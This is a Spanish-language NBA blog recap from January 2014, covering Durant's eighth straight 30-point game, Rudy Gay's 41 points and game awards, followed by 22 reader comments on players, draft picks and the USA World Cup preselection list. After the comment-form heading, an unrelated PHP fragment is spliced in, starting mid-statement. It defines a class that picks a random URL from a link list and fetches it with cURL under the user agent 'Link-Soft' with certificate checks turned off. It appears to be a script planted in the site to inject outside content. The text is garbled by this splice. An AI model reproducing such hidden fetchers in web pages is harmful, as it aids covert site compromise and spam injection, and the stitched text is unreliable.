La Crónica: Noche de aleros

22 de January de 2014 por TheDeerHunter

8º partido con un +30 consecutivo del Sr. Durant. Empieza a amenazar seriamente récords de anotación como los que en su día firmaron Kobe (2012-13: 10 partidos) y LeBron (2006-07: ídem). Lo más alucinante en este nivel anotador sería terminar la temporada por segunda vez en su carrera con el mítico “50-40-90” en TC – 3P – TL. Sólo Nash en 4 ocasiones (sin una barbaridad ofensiva de este calibre) y Larry Bird en otros 2 podrían equipararse. Si no hemos terminado con nuestra capacidad de sorpresa debemos añadir que anoche lo hizo frente a uno de los primeros candidatos al trono del oeste como es Portland (97-105).

El segundo alero en discordia de la jornada fue Rudy Gay, jugador altamente exigido y con toda la razón del mundo. Resulta extraño que haya encontrado su hábitat natural en Sacramento. Anoche firmó un 41 – 8 – 5 en el que bien podría haber sido el mejor partido de su carrera. Eso sí, fue ante unos Pelicans desquiciados por culpa de las lesiones en medio de una temporada regular y estéril para ambos (114-97).

LeBron, por su parte, sigue manteniendo a los Heat en la pomada. Con todas las dificultades que acontecen al equipo campeón, el de Ohio se las apaña para no perder comba en cabeza. Anoche, victoria ante los Celtics con 29 puntos, 8 rebotes, 4 asistencias y buenos porcentajes de tiro que se antojan una menudencia (86-93). 

Finalmente, unos Wolves que trataban de volver a la zona de playoffs ante Utah con un Love rozando el triple doble y 6 hombres en dobles figuras (112-97) y unos Nets manteniendo el ritmo tiunfal. Ante Orlando, eso sí (90-101).

PREMIOS

MVP: Kevin Durant sigue a lo suyo. 8º partido consecutivo con más de 30 puntos, 4º con más de 40 en este mes de enero. Esta vez fueron exactamente 46 puntos adornados con 5 rebotes y 4 asistencias. Rudy Gay también pasó de la cuarentena de puntos. Se fue a los 41 y además cogió 8 rebotes y repartió 5 asistencias.

Rookie: Ante las bajas de Anderson y Smith y la inoperancia de Stiemsma, el entrenador de los Pelicans se vio obligado a recurrir a Jeff Withey y el rookie no desentonó. 14 puntos, 5 rebotes, 2 robos y 2 tapones en 27 minutos para él.

Sorpresa: Kyle O’Quinn fue el mejor de los Magic saliendo desde el banco y es que al quintento titular más le valía haberse quedado en casa. Anotó 15 puntos, capturó 8 rebotes y puso un par de tapones.

Decepción: 11 puntos, 2 rebotes, 1 asistencias, 3 pérdidas… Corto bagaje para un jugador que aspira a asistir al All Star. Hablamos de Arron Afflalo.

Esfuerzo en vano: Volvió Gordon Hayward a un gran nivel (27 puntos, 5 rebotes, 5 asistencias y 3 robos) pero los Jazz cayeron claramente ante los Wolves. Los Blazers de Lamarcus Aldridge también cayeron a pesar de sus 29 puntos y 16 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Afflalo no irá al all star ni de coña con ese record

      Citar

  2. Denise dice:
    #2

    Partido 622 de Nelson con la camiseta de los Magic, convirtiéndose en el segundo jugador de la franquicia con más partidos, situándose a 70 partidos del primero, Nick Anderson.
    Me encanta O’quinn y menos mal que desde arriba presionaron a Vaughn para ponerlo en lugar de Maxiell. En sus últimos 4 partidos, sus números son de 22 minutos por partido, 11,7 puntos, 7,7 rebotes y 63% tiros de campo más sus intangibles que para mí es su principal virtud.

    Se tiene que lesionar Favors para que el merluzo de Tyronne Corbin rescate a Rudy Gobert de la D-League donde lo han enviado injustamente y le den minutos. 27 minutitos muy bien aprivechados del francés con 8 puntos, 6 rebotes y 3 gorros. Con un entrenador en condiciones y no el paquete éste de Corbin, el francés estaría jugando minutadas y peleando por el Rookie del año…

    Deer, respeto tu labor ya que no es fácil compaginar la redacción de crónicas con las responsabilidades diarias de cada uno, pero te has colado con Afflalo que ha hecho un decente partido mientrás el Sr. Eric Gordon se ha borrado del partido con un 2/6 , y mientrás el Sr Batum ha acabado con 3 puntos en su casillero y comiéndose canastas de todos los colores de Durant, quien para mí es el MVP hasta el momento.

    Los Kings deberían mover a Thornton y darle sus minutos a McLemore. Jugando 7 minutos, es imposible que un chaval ya picha fría por naturaleza, se integre en la liga.

      Citar

  3. Denise dice:
    #3

    Jose Luis:
    Afflalo no irá al all star ni de coña con ese record

    Por número sí podría ir, pero entre que no es mediático, y el pesimo balance de Orlando, es totalmente comprensible que no vaya.
    Por cierto, ¿este año tambien van a hacer la bazofia esa de mezclar a rookies y sophomores? Entre este partido y el de Rodman y otros juguetes rotos en Corea del Norte, no sabría decir cual es más interesante…

      Citar

  4. txusma dice:
    #4

    Denise:

    Deer, respeto tu labor ya que no es fácil compaginar la redacción de crónicas con las responsabilidades diarias de cada uno, pero te has colado con Afflalo que ha hecho un decente partido mientrás el Sr. Eric Gordon se ha borrado del partido con un 2/6, y mientrás el Sr Batum ha acabado con 3 puntos en su casillero y comiéndose canastas de todos los colores de Durant, quien para mí es el MVP hasta el momento.

    Ya dije que los premios los otorgo yo. El apartado ‘Decepción’ no es para el peor jugador de la jornada sinó para aquellos que no han cumplido las expectativas. Batum está jugando con un dedo roto y yo de Eric Gordon no espero mucho. En cambio, sí q espero que Afflalo tire de su equipo mejor de lo q hizo ayer. A los mejores hay q exigirles cada día.

      Citar

  5. Denise dice:
    #5

    txusma: Ya dije que los premios los otorgo yo. El apartado ‘Decepción’ no es para el peor jugador de la jornada sinó para aquellos que no han cumplido las expectativas. Batum está jugando con un dedo roto y yo de Eric Gordon no espero mucho. En cambio, sí q espero que Afflalo tire de su equipo mejor de lo q hizo ayer. A los mejores hay q exigirles cada día.

    OK, pero Gordon cobra 14 kilos y su estatus es de jugador franquicia. Su temporada es decepcionante y los Pelicans deberían quitárselo de en medio en cuanto tengan la más mínima oportunidad.

      Citar

  6. Viva_Dirk dice:
    #6

    Aun estando deacuerdo con Denise en que debe jugar McLemore por delante de Thornton no se puede decir que no halla tenido oportunidades. Esta promediando 23.6 minutos y lanzando muy mal a canasta, aporta defensa pero hasta la fecha no esta al nivel ofensivo que se esperaba de el.

    Sobre si Durant debe ser el MVP, va a depender de los records colectivos a final de temporada. Si los Blazers acaban entre los 4 primeros del oeste para mi LaMarcus es un candidato firme.

      Citar

  7. Vader dice:
    #7

    Por cierto ya se que no viene a cuento porque ayer no jugaron los Knicks pero como el presente de mi equipo no ilusiona mucho estuve buceando por internet para saber exactamente las rondas que tiene NY en los próximos años:

    2014 no tiene primera ronda
    2015 tiene su ronda
    2016 Denver tiene la opción de intercambiar su ronda con NY
    2017 tiene su ronda
    2018 idem
    2019 idem
    ….

    Vamos que sólo en 2014 no tenemos ninguna primera ronda. Es un poco mejor de lo que me pensaba. Lastima que no tengamos ninguna en el próximo draft pero el resto de años si tenemos.

    Saludos

      Citar

  8. Denise dice:
    #8

    Vader:

    Vamos que sólo en 2014 no tenemos ninguna primera ronda. Es un poco mejor de lo que me pensaba. Lastima que no tengamos ninguna en el próximo draft pero el resto de años si tenemos.

    Va a ser de Orlando fijo, a si que perder cuantos mas partidos perdáis mejor. 🙂
    Ahora en serio, ya que imagino que NY se eliminará en primera ronda de Playoffs. ¿Qué criterios se siguen para determinar el orden en el Draft de los equipos caidos en primera ronda? En función de eso, Orlando debería pillar entre un Pick 15 y un Pick 22.

      Citar

  9. Esteban dice:
    #9

    Denise:

    Los Kings deberían mover a Thornton y darle sus minutos a McLemore. Jugando 7 minutos, es imposible que un chaval ya picha fría por naturaleza, se integre en la liga.

    NOOOOOO de vuelta McLemore NO! por dios, desde que salio del 5 inicial los Kings han mejorado, y Thorton, si bien esta pasando un momento flojo (casi no dispone de tiros y el es un anotador de volumen que requiere muchos), al menos no pierde balones

    al contrario, con ese contrato de Thorton, y viendo que ha jugado de buena manera muchas veces, yo apostaria a rescatar a Thorton mas que a McLemore, puesto que el primer es intransferible gracias a ese contrato

      Citar

  10. Simon dice:
    #10

    Denise: Va a ser de Orlando fijo, a si que perder cuantos mas partidos perdáis mejor.
    Ahora en serio, ya que imagino que NY se eliminará en primera ronda de Playoffs. ¿Qué criterios se siguen para determinar el orden en el Draft de los equipos caidos en primera ronda? En función de eso, Orlando debería pillar entre un Pick 15 y un Pick 22.

    A partir de los equipos de Play Off va por orden de peor a mejor record sin importar las rondas de Play Off superadas. Por ejemplo hoy en día el pick 14 sería para los Bobcats y el 30 para Indiana independientemente de PO.

      Citar

  11. Vader dice:
    #11

    Simon: A partir de los equipos de Play Off va por orden de peor a mejor record sin importar las rondas de Play Off superadas. Por ejemplo hoy en día el pick 14 sería para los Bobcats y el 30 para Indiana independientemente dePO.

    Exacto, orden de clasificación. El año pasado por ejemplo Indiana eligio un puesto por delante de Knicks aunque fueran los Pacers los que eliminaran a Knicks.

    Saludos

      Citar

  12. Vader dice:
    #12

    Jajajaja pero ahora que lo reviso en 2016 no tenemos ninguna. Denver se queda con la suya o la de NY (la mejor de las dos) y la otra ira para Toronto por el traspaso de Bargiani… 😛

    O sea que hasta 2017 y en adelante que conservamos todas nuestras rondas sólo tenemos primeras en 2015 y alguna segunda ronda.

    Ta la cosita muy mal.

    Saludos

      Citar

  13. Denise dice:
    #13

    Simon: A partir de los equipos de Play Off va por orden de peor a mejor record sin importar las rondas de Play Off superadas. Por ejemplo hoy en día el pick 14 sería para los Bobcats y el 30 para Indiana independientemente dePO.

    Ok, perfect. Gracias

      Citar

  14. Sancho88 dice:
    #14

    Yo opino igual que Denise, Thornton no debería jugar por delante de McLemore ni de coña. El equipo no va bien porque Thornton sea titular y no McLemore, esa no es la razón, el equipo va bien por la buena sintonía entre Thomas, Gay y Cousins y el trabajo en la sombra de Jason Thompson y de Derrick Williams saliendo desde el banquillo.

    De hecho, lo de Thornton roza lo patético. Ayer se tiró una castaña totalmente solo contra los Pelicans que pasó a más de un metro de canasta. No sé dónde está el suelo de este jugador, si es que puede caer más abajo, pero ahora mismo está jugando el peor baloncesto de su carrera, cuando por lo que cobra debería jugar al más alto nivel. Y McLemore es un rookie de 19-20 años. Hay que darle tiempo, solo lleva 40 partidos en la NBA y es injusto juzgarle por eso. No está tirando apenas, tampoco los sistemas lo incluyen demasiado en ataque, pero como comentáis en defensa es mil veces mejor que Thornton y en juego en equipo ya ni te cuento. Un jugador solidario que está ayudando mucho al equipo cuando juega. No hace números pero es un jugador de garantías. Triunfará en los Kings en los próximos años.

    Y Thornton es eso ahora mismo, un miembro honorífico del club del ‘cazo mix’. Ni siquiera estoy seguro de si relanzará su carrera en cualquier otro equipo. El chaval está down down down

      Citar

  15. Denise dice:
    #15

    La lista de 28 preselccionados para el Mundial de este año, aunque Lebron, Melo y Paul no tienen previsto acudir. Y lo de incluir a Rose me parece una broma.

    LaMarcus Aldridge, Carmelo Anthony, Bradley Beal, Tyson Chandler, DeMarcus Cousins, Stephen Curry, Anthony Davis, Dwight Howard, Andre Iguodala, Kyrie Irving, LeBron James, Kyle Korver, David Lee, Kawhi Leonard, Andre Drummond, Kevin Durant, Kenneth Faried, Paul George, Blake Griffin, James Harden, Gordon Hayward, Damian Lillard, Kevin Love, Chris Paul, Derrick Rose, Klay Thompson, Russell Westbrook, Deron Williams.

      Citar

  16. Jose Luis dice:
    #16

    que coñazo tanta gente xD

    Faried? Korver? Beal? Hayward? Thompson?

    Cuanto “paquete” suelto xDDDDD

      Citar

  17. txusma dice:
    #17

    Jose Luis:
    que coñazo tanta gente xD

    Faried? Korver? Beal? Hayward? Thompson?

    Cuanto “paquete” suelto xDDDDD

    Es una preselección y a mí gente como Bradley Beal, Gordon Hayward o Klay Thompson no me molestan para nada. Prefiero que USA presente un EQUIPO que un conjunto de estrellas.

      Citar

  18. Melo15 dice:
    #18

    La ausencia de John Wall le quita todo el sentido a esta lista.
    De verdad es mejor Korver que Wall? Irving que Wall? Incluso Lillard es mejor que Wall?
    Aprovecho para hacer una critica a Irving porque esta temporada no lo esta haciendo bien, sigue sin hacer jugar a su equipo, en defensa no destaca y ademas esta teniendo malos porcentajes. En mi opinion Irving va a ser un Arenas de la vida. Este año los Cavs tienen plantillon y lo estan haciendo de pena.

      Citar

  19. Jose Luis dice:
    #19

    Lillard le da a Wall 10mil vueltas xD

    Irving también me parece mucho mejor que Wall

      Citar

  20. Melo15 dice:
    #20

    Pues no lo entiendo. Si Lillard es mejor que Wall es discutible, pero en que es superior Irving a Wall? Tirando.
    Wall es mas atletico, mejor defensor, mucho mejor pasador y anotando cerca del aro ligeramente superior.
    Ademas de que Wall es un lider que esta guiando a los Wizards a PO. Si tu comparas el equipo de los Cavs y el de los Wizards cual es mejor? Los Cavs en mi opinion
    Lillard quizas es mejor que Wall es ciertos aspectos, pero Wall es mucho mas completo.

      Citar

  21. Vader dice:
    #21

    Melo15:
    Pues no lo entiendo. Si Lillard es mejor que Wall es discutible, pero en que es superior Irving a Wall? Tirando.
    Wall es mas atletico, mejor defensor, mucho mejor pasador y anotando cerca del aro ligeramente superior.
    Ademas de que Wall es un lider que esta guiando a los Wizards a PO. Situ comparas el equipo de los Cavs y el de los Wizards cual es mejor? Los Cavs en mi opinion
    Lillard quizas es mejor que Wall es ciertos aspectos, pero Wall es mucho mas completo.

    Hay que tener en cuenta que Irving juega con un handicap: Mike Brown…

      Citar

  22. rumbero dice:
    #22

    Melo15:
    Pues no lo entiendo. Si Lillard es mejor que Wall es discutible, pero en que es superior Irving a Wall? Tirando.
    Wall es mas atletico, mejor defensor, mucho mejor pasador y anotando cerca del aro ligeramente superior.
    Ademas de que Wall es un lider que esta guiando a los Wizards a PO. Situ comparas el equipo de los Cavs y el de los Wizards cual es mejor? Los Cavs en mi opinion
    Lillard quizas es mejor que Wall es ciertos aspectos, pero Wall es mucho mas completo.

    Yo me quedo con los Wizards. Y de bastante además. Mucho más equipo y como deja caer Vader, cuentan con un entrenador. Pero vaya que esto es cuestión de gustos.
    Irving no está haciendo una buena temporada, estoy de acuerdo, pero colgarle ya la etiqueta de Arenas con 21 años es muy osado. El tema es, que jugador de los Cavs está jugando mejor que la temporada pasada? Creo que ninguno. Waiters y Thompson estancados, un tío como Jack que sonaba para sexto hombre la temporada pasada con un papel muy gris y veremos como le va a Deng pero a mi me da que se va a pirar a poco que pueda. Igual es que yo también esperaba mucho más de esta plantilla, pero hasta que no larguen a Brown no saldré de dudas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>